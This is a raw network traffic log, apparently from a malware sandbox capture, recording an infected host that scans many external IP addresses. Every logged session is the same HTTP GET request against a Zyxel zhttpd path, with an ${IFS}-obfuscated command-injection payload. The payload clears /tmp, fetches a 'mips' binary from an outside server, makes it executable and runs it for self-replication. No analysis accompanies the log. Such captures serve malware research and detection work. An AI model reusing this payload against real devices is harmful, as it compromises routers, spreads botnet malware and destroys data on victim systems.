                              Mar 31, 2024 08:42:27.584758043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9812192.168.2.134296870.177.47.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584805012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9813192.168.2.1357934162.115.207.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584855080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9814192.168.2.13579641.24.6.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584901094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9815192.168.2.1338886149.16.100.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584929943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9816192.168.2.1355114128.10.52.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.584960938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9817192.168.2.133470818.246.45.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585037947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9818192.168.2.1360732170.19.113.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585073948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9819192.168.2.134683290.73.159.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585108042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9820192.168.2.1355704205.242.0.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585155964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9821192.168.2.1345644181.142.214.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585176945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9822192.168.2.1351522150.209.140.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585244894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9823192.168.2.1345994131.219.103.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585268974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9824192.168.2.1346698175.161.39.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585282087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9825192.168.2.133762092.11.66.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585357904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9826192.168.2.1336630115.240.4.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585390091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9827192.168.2.1355230131.202.6.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585423946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9828192.168.2.1352480190.64.169.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585464001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9829192.168.2.1355234116.246.56.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585494041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9830192.168.2.135733267.176.27.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585545063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9831192.168.2.1335802172.217.114.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585566998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9832192.168.2.13579469.217.135.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585599899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9833192.168.2.1357764133.216.47.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585655928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9834192.168.2.13532662.132.31.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585694075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9835192.168.2.134411074.152.188.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585758924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9836192.168.2.135118035.163.215.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585783958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9837192.168.2.1352390199.82.7.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585834980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9838192.168.2.133296886.130.104.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585863113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9839192.168.2.134514444.96.67.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585899115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9840192.168.2.1333350128.40.37.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585946083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9841192.168.2.135872036.67.34.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.585964918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9842192.168.2.1350158124.44.41.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586009026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9843192.168.2.1351060181.246.197.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586030006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9844192.168.2.1340594183.0.15.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586102009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9845192.168.2.1337486213.120.234.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586148024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9846192.168.2.1336660211.1.220.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586173058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9847192.168.2.134680424.183.231.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586205006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9848192.168.2.134537873.151.15.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586235046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9849192.168.2.1332974209.139.98.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586281061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9850192.168.2.1350140187.15.77.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586333036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9851192.168.2.1339290207.211.254.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586349010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9852192.168.2.1355742168.160.73.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586393118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9853192.168.2.135045096.211.26.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586409092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9854192.168.2.135371235.116.88.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586467981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9855192.168.2.1351764107.130.212.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586524010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9856192.168.2.1347174163.131.12.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586569071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9857192.168.2.1339634144.248.20.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586601019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9858192.168.2.1357784222.94.172.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586638927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9859192.168.2.135475093.43.48.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586707115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9860192.168.2.1338226161.242.38.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586726904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9861192.168.2.1342698114.176.174.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586779118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9862192.168.2.134274637.13.36.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586823940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9863192.168.2.1349688128.74.205.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586889029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9864192.168.2.1351076160.241.84.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586920977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9865192.168.2.133764883.166.31.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.586982012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9866192.168.2.135413465.193.179.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587038040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9867192.168.2.1346634121.188.242.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587059975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9868192.168.2.1349762202.82.238.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587110043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9869192.168.2.1358052211.161.36.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587143898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9870192.168.2.1356308185.169.254.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587181091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9871192.168.2.1350564173.239.244.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587233067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9872192.168.2.133864614.105.16.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587274075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9873192.168.2.135820636.111.71.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587302923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9874192.168.2.135577646.86.101.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587362051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9875192.168.2.1334056161.165.134.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587415934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9876192.168.2.136095236.117.114.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587471962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9877192.168.2.1354204211.8.145.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587496996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9878192.168.2.134146224.245.163.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587532997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9879192.168.2.1357380172.7.58.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587579966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9880192.168.2.1360222220.205.52.167443
                              TimestampBytes transferredDirectionData
